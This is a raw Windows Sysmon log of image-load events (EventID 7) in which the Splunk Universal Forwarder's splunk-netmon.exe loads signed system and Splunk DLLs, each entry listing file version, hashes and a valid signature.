EventID=7 ; EventRecordID=100652 ; UtcTime=2022-05-30 13:06:47.418 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\rsaenh.dll ; FileVersion=10.0.14393.4467 (rs1_release.210604-1844) ; Description=Microsoft Enhanced Cryptographic Provider ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=rsaenh.dll ; Hashes=MD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100651 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\cryptsp.dll ; FileVersion=10.0.14393.2969 (rs1_release.190503-1820) ; Description=Cryptographic Service Provider API ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=cryptsp.dll ; Hashes=MD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100650 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\srvcli.dll ; FileVersion=10.0.14393.5066 (rs1_release.220401-1841) ; Description=Server Service Client DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=SRVCLI.DLL ; Hashes=MD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1F ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100649 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\bcrypt.dll ; FileVersion=10.0.14393.4583 (rs1_release.210730-1850) ; Description=Windows Cryptographic Primitives Library ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=bcrypt.dll ; Hashes=MD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238D ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100648 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\wkscli.dll ; FileVersion=10.0.14393.5066 (rs1_release.220401-1841) ; Description=Workstation Service Client DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=WKSCLI.DLL ; Hashes=MD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100647 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\netutils.dll ; FileVersion=10.0.14393.0 (rs1_release.160715-1616) ; Description=Net Win32 API Helpers DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=NETUTILS.DLL ; Hashes=MD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100646 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\netapi32.dll ; FileVersion=10.0.14393.5125 (rs1_release.220429-1732) ; Description=Net Win32 API DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=NetApi32.DLL ; Hashes=MD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100645 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\sspicli.dll ; FileVersion=10.0.14393.5006 (rs1_release.220301-1704) ; Description=Security Support Provider Interface ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=sspicli.dll ; Hashes=MD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100644 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll ; FileVersion=14.16.27012.6 built by: vcwrkspc ; Description=Microsoft® C Runtime Library ; Product=Microsoft® Visual Studio® 2017 ; Company=Microsoft Corporation ; OriginalFileName=msvcp140.dll ; Hashes=MD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DD ; Signed=true ; Signature=Microsoft Corporation ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100643 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\Wldap32.dll ; FileVersion=10.0.14393.5125 (rs1_release.220429-1732) ; Description=Win32 LDAP API DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=WLDAP32.DLL ; Hashes=MD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100642 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\msvcp_win.dll ; FileVersion=10.0.14393.2999 (rs1_release_inmarket.190520-1518) ; Description=Microsoft® C Runtime Library ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=msvcp_win.dll ; Hashes=MD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59A ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100641 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\oleaut32.dll ; FileVersion=10.0.14393.4402 (rs1_release.210426-1725) ; Description=OLEAUT32.DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=OLEAUT32.DLL ; Hashes=MD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962F ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100640 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\bcryptprimitives.dll ; FileVersion=10.0.14393.4770 (rs1_release.211101-1440) ; Description=Windows Cryptographic Primitives Library ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=bcryptprimitives.dll ; Hashes=MD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100639 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll ; FileVersion=14.16.27012.6 built by: vcwrkspc ; Description=Microsoft® C Runtime Library ; Product=Microsoft® Visual Studio® 2017 ; Company=Microsoft Corporation ; OriginalFileName=vcruntime140.dll ; Hashes=MD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7E ; Signed=true ; Signature=Microsoft Corporation ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100638 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\combase.dll ; FileVersion=10.0.14393.5125 (rs1_release.220429-1732) ; Description=Microsoft COM for Windows ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=COMBASE.DLL ; Hashes=MD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100637 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\adsldpc.dll ; FileVersion=10.0.14393.0 (rs1_release.160715-1616) ; Description=ADs LDAP Provider C DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=adsldpc ; Hashes=MD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100636 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll ; FileVersion=1.0.2za ; Description=OpenSSL Shared Library ; Product=The OpenSSL Toolkit ; Company=The OpenSSL Project, http://www.openssl.org/ ; OriginalFileName=libeay32.dll ; Hashes=MD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFE ; Signed=true ; Signature=Splunk, Inc. ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100635 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\ole32.dll ; FileVersion=10.0.14393.4651 (rs1_release.210911-1554) ; Description=Microsoft OLE for Windows ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=OLE32.DLL ; Hashes=MD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100634 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\archive.dll ; FileVersion=- ; Description=- ; Product=- ; Company=- ; OriginalFileName=- ; Hashes=MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44 ; Signed=true ; Signature=Splunk, Inc. ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100633 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\gdi32full.dll ; FileVersion=10.0.14393.5125 (rs1_release.220429-1732) ; Description=GDI Client DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=gdi32 ; Hashes=MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EE ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100632 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll ; FileVersion=- ; Description=- ; Product=- ; Company=- ; OriginalFileName=- ; Hashes=MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72E ; Signed=true ; Signature=Splunk, Inc. ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100631 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll ; FileVersion=- ; Description=- ; Product=- ; Company=- ; OriginalFileName=- ; Hashes=MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2 ; Signed=true ; Signature=Splunk, Inc. ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100630 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\ucrtbase.dll ; FileVersion=10.0.14393.3659 (rs1_release_1.200410-1813) ; Description=Microsoft® C Runtime Library ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=ucrtbase.dll ; Hashes=MD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44C ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100629 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\gdi32.dll ; FileVersion=10.0.14393.4169 (rs1_release.210107-1130) ; Description=GDI Client DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=gdi32 ; Hashes=MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00C ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100628 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll ; FileVersion=1.0.2za ; Description=OpenSSL Shared Library ; Product=The OpenSSL Toolkit ; Company=The OpenSSL Project, http://www.openssl.org/ ; OriginalFileName=ssleay32.dll ; Hashes=MD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63 ; Signed=true ; Signature=Splunk, Inc. ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100627 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll ; FileVersion=- ; Description=- ; Product=- ; Company=- ; OriginalFileName=- ; Hashes=MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916 ; Signed=true ; Signature=Splunk, Inc. ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100626 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll ; FileVersion=2.9.10 ; Description=libxml2 library ; Product=libxml2 ; Company=- ; OriginalFileName=libxml2.dll ; Hashes=MD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20 ; Signed=true ; Signature=Splunk, Inc. ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100625 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\win32u.dll ; FileVersion=10.0.14393.0 (rs1_release.160715-1616) ; Description=Win32u ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=Win32u.DLL ; Hashes=MD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100624 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\nsi.dll ; FileVersion=10.0.14393.3297 (rs1_release_1.191001-1045) ; Description=NSI User-mode interface DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=nsi.dll ; Hashes=MD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27,IMPHASH=B01B7830101BC0D5FBDE4FFE2B170CF7 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100623 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\activeds.dll ; FileVersion=10.0.14393.4169 (rs1_release.210107-1130) ; Description=ADs Router Layer DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=ADs ; Hashes=MD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBB ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100622 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\user32.dll ; FileVersion=10.0.14393.4169 (rs1_release.210107-1130) ; Description=Multi-User Windows USER API Client DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=user32 ; Hashes=MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100621 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\IPHLPAPI.DLL ; FileVersion=10.0.14393.2339 (rs1_release_inmarket.180611-1502) ; Description=IP Helper API ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=iphlpapi.dll ; Hashes=MD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728B,IMPHASH=98738BA55485CCA932F6D222F47FFC55 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100620 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\dnsapi.dll ; FileVersion=10.0.14393.4350 (rs1_release.210407-2154) ; Description=DNS Client API DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=dnsapi ; Hashes=MD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9,IMPHASH=3C043C6FF0F62DAEB8819606F79C5ECC ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100619 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\secur32.dll ; FileVersion=10.0.14393.2273 (rs1_release_1.180427-1811) ; Description=Security Support Provider Interface ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=secur32.dll ; Hashes=MD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100618 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\msvcrt.dll ; FileVersion=7.0.14393.2457 (rs1_release_inmarket.180822-1743) ; Description=Windows NT CRT DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=msvcrt.dll ; Hashes=MD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAF ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100617 ; UtcTime=2022-05-30 13:06:47.402 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\advapi32.dll ; FileVersion=10.0.14393.4886 (rs1_release.220104-1735) ; Description=Advanced Windows 32 Base API ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=advapi32.dll ; Hashes=MD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EA ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100616 ; UtcTime=2022-05-30 13:06:47.401 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\rpcrt4.dll ; FileVersion=10.0.14393.5125 (rs1_release.220429-1732) ; Description=Remote Procedure Call Runtime ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=rpcrt4.dll ; Hashes=MD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100615 ; UtcTime=2022-05-30 13:06:47.401 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\sechost.dll ; FileVersion=10.0.14393.5006 (rs1_release.220301-1704) ; Description=Host for SCM/SDDL/LSA Lookup APIs ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=sechost.dll ; Hashes=MD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
